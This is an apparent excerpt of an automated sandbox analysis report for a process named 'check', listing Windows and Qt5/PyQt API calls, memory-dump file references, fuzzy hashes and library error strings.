                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F01E121B0874180EA44DF529905169A691BF8DFE8F68C6B0EE6ED3BE6EE3CD1018300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B129390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF60B1245F4,00000000,00007FF60B121985), ref: 00007FF60B1293C9
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00007FF60B126476,?,00007FF60B12336E), ref: 00007FF60B128EA2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2592636585-0
                                                                                                                                                                                                                • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                • Instruction ID: 01cd9a7526c7c8f440b045bc88570c85f294c4663952808e4504839a176dbcbd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18D0C201F3824542FA44A77BBA4663A5251AFCDFC8FA8C075EE4E83B6AEC3CC0514B00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF60B13B32A,?,?,?,00007FF60B134F11,?,?,?,?,00007FF60B13A48A), ref: 00007FF60B13EBED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                • Instruction ID: 5709bcd6966c936914359005c7f7cbc1c402992d24c306a335c10f8289a1f4e5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF01756B0930781FE5A5B6A98553B912945F8DF88F6CC5B0C90FC63FAFE2DE4858220
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF60B130C90,?,?,?,00007FF60B1322FA,?,?,?,?,?,00007FF60B133AE9), ref: 00007FF60B13D63A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                • Instruction ID: 8b8484f886145999ae37c0daceb4e54582067fe2a78f4bdb5e948203d8066697
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DF0F890F0924685FE655772684167912A55F8DFACF6887B0DD3FC62E2FE2CA4C08610
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?startsWith@QByteArray@@QEBA_NPEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E350
                                                                                                                                                                                                                • ?lastIndexOf@QByteArray@@QEBAHDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E369
                                                                                                                                                                                                                • ?mid@QByteArray@@QEBA?AV1@HH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E3A1
                                                                                                                                                                                                                • ?mid@QByteArray@@QEBA?AV1@HH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E3B7
                                                                                                                                                                                                                • ??0QString@@QEAA@AEBVQByteArray@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E3C5
                                                                                                                                                                                                                • ?qt_qFindChild_helper@@YAPEAVQObject@@PEBV1@AEBVQString@@AEBUQMetaObject@@V?$QFlags@W4FindChildOption@Qt@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E3DF
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E3F0
                                                                                                                                                                                                                • ?methodCount@QMetaObject@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E418
                                                                                                                                                                                                                • ?method@QMetaObject@@QEBA?AVQMetaMethod@@H@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E43A
                                                                                                                                                                                                                • ?methodType@QMetaMethod@@QEBA?AW4MethodType@1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E444
                                                                                                                                                                                                                • ?methodSignature@QMetaMethod@@QEBA?AVQByteArray@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E45B
                                                                                                                                                                                                                  • Part of subcall function 00007FFB030532F0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFB0305E46E), ref: 00007FFB03053300
                                                                                                                                                                                                                  • Part of subcall function 00007FFB030532F0: ?indexOf@QByteArray@@QEBAHDH@Z.QT5CORE(?,?,00000000,00007FFB0305E46E), ref: 00007FFB0305330E
                                                                                                                                                                                                                  • Part of subcall function 00007FFB030532F0: ?truncate@QByteArray@@QEAAXH@Z.QT5CORE(?,?,00000000,00007FFB0305E46E), ref: 00007FFB0305331D
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E48C
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E498
                                                                                                                                                                                                                • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E4A7
                                                                                                                                                                                                                • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E4B8
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E4F1
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E4FD
                                                                                                                                                                                                                • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E50C
                                                                                                                                                                                                                • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E528
                                                                                                                                                                                                                • ??0QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E53A
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E544
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03053250: ??0QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFB0305E4D8), ref: 00007FFB03053265
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03053250: ?indexOf@QByteArray@@QEBAHDH@Z.QT5CORE(?,?,?,00007FFB0305E4D8), ref: 00007FFB03053273
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03053250: ?lastIndexOf@QByteArray@@QEBAHDH@Z.QT5CORE(?,?,?,00007FFB0305E4D8), ref: 00007FFB03053286
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03053250: ?mid@QByteArray@@QEBA?AV1@HH@Z.QT5CORE(?,?,?,00007FFB0305E4D8), ref: 00007FFB030532A5
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03053250: ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,00007FFB0305E4D8), ref: 00007FFB030532B1
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03053250: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFB0305E4D8), ref: 00007FFB030532BC
                                                                                                                                                                                                                • ?prepend@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E582
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E58C
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E599
                                                                                                                                                                                                                • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFB0305E5BA
                                                                                                                                                                                                                • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFB0305E5C4
                                                                                                                                                                                                                • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E5D4
                                                                                                                                                                                                                • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E5DE
                                                                                                                                                                                                                • ?methodCount@QMetaObject@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E5EA
                                                                                                                                                                                                                • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E60D
                                                                                                                                                                                                                • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,FFFFFFFF), ref: 00007FFB0305E617
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Byte$Array@@$Meta$Object@@$?constData@$?method$?mid@Method@@String@@$?index?lastConnection@Count@FindIndexType@V0@@memcmp$?connect@?method@?prepend@?qt_q?starts?truncate@Array@@@ChildChild_helper@@ConnectionFlags@MethodOption@Qt@@@Qt@@@@@Signature@Type@1@V0@$$With@
                                                                                                                                                                                                                • String ID: on_
                                                                                                                                                                                                                • API String ID: 1162934494-3160432451
                                                                                                                                                                                                                • Opcode ID: f062a583b174c3894386cf065a686027ed31ced847b8072cebcec6202e077be0
                                                                                                                                                                                                                • Instruction ID: 7e45c0c2c7ae711a26271f63b58ee5af75530ad76e0ea6b2a5ad0069e45bf575
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f062a583b174c3894386cf065a686027ed31ced847b8072cebcec6202e077be0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4914CB2B06A4299EB10DF71E858BAD6360EB45B98F485131CE4E67A68FF3CD549C304
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Meta$Byte$Builder@@$Array@@Object$Object@@$Data@@Hash$Array@@@Connection@$?add?setMethodMutex@@Slot@State_V0@@$?allocate?connect@?detach_helper@?free_helper@?lock@?rehash@?unlock@ClassClass@ConnectionEnsureName@Node@Node@1@Node@1@@Object@Object@@@Qt@@@ReleaseSuperType@Weakref_malloc
                                                                                                                                                                                                                • String ID: 1disable()$2destroyed(QObject *)$PyQtSlotProxy$disable()$unislot()
                                                                                                                                                                                                                • API String ID: 3092892276-4214815788
                                                                                                                                                                                                                • Opcode ID: ea66a1bb55d5ff6fa8b7292e8b7a47100cb195b4a02b1d2f250d03d25d59fa10
                                                                                                                                                                                                                • Instruction ID: e06bec91f591f2b5a8674f6f3676230f42cec17a9f00b05ceacfcc3e68b53385
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea66a1bb55d5ff6fa8b7292e8b7a47100cb195b4a02b1d2f250d03d25d59fa10
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 089186B1A1AB4786EB10DF21E858A797371FB88B44F485031DA4E63768EF3CE589C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?type@QVariant@@QEBA?AW4Type@1@XZ.QT5CORE(00000000,00000000,00000000,00007FFB0305242A,?,?,?,00007FFB0304F0E2), ref: 00007FFB030524E1
                                                                                                                                                                                                                • ?toMap@QVariant@@QEBA?AV?$QMap@VQString@@VQVariant@@@@XZ.QT5CORE(?,?,?,00007FFB0304F0E2), ref: 00007FFB030524F4
                                                                                                                                                                                                                • ?userType@QVariant@@QEBAHXZ.QT5CORE(00000000,00000000,00000000,00007FFB0305242A,?,?,?,00007FFB0304F0E2), ref: 00007FFB03052540
                                                                                                                                                                                                                • ?userType@QVariant@@QEBAHXZ.QT5CORE(?,?,?,00007FFB0304F0E2), ref: 00007FFB03052550
                                                                                                                                                                                                                • PyErr_Format.PYTHON3(?,?,?,00007FFB0304F0E2), ref: 00007FFB0305256D
                                                                                                                                                                                                                • ?constData@QVariant@@QEBAPEBXXZ.QT5CORE(00000000,00000000,00000000,00007FFB0305242A,?,?,?,00007FFB0304F0E2), ref: 00007FFB030526A4
                                                                                                                                                                                                                • ?endsWith@QByteArray@@QEBA_ND@Z.QT5CORE ref: 00007FFB03052705
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?userMap@Type@$?const?ends?type@Array@@ByteData@Err_FormatString@@Type@1@Variant@@@@With@
                                                                                                                                                                                                                • String ID: _QMLTYPE_$unable to convert a C++ '%s' instance to a Python object$unable to convert a QVariant back to a Python object$unable to convert a QVariant of type %d to a QMetaType of type %d
                                                                                                                                                                                                                • API String ID: 4253187488-925150832
                                                                                                                                                                                                                • Opcode ID: 98aabd8b041ee5aedf3128f52e3c14990977733215ac12ec71dd295027f8fda8
                                                                                                                                                                                                                • Instruction ID: 68c9706c82dfe76dc5defe29443b0a79c76bbd8681c2bf99a4916c53093f2661
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98aabd8b041ee5aedf3128f52e3c14990977733215ac12ec71dd295027f8fda8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48C177A2B0AA0286EA10DF35E858A7A7364FF89B95F4C4531DE0D67764EF3CD486C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Err_$Data@@List$?dispose@ClearData@1@@$Iter_Nextmemcpy$?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_
                                                                                                                                                                                                                • String ID: index %zd has type '%s' but 'QObject' is expected
                                                                                                                                                                                                                • API String ID: 1419802644-993837817
                                                                                                                                                                                                                • Opcode ID: f057fda980e5a2c8505109e28d3e83182f8b3ff2102f2091c66ea79c1e307902
                                                                                                                                                                                                                • Instruction ID: b9695f4c9e41384b09dd83f04984dc533e252494aa4641d3bd5a88673b69f4d0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f057fda980e5a2c8505109e28d3e83182f8b3ff2102f2091c66ea79c1e307902
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40A1AEBAA09A428AEA509F25E658B7C7760FF84B91F084031CE4E53755EF7DD499C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • index %zd has type '%s' but 'QAbstractState' is expected, xrefs: 00007FFB02F34739
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
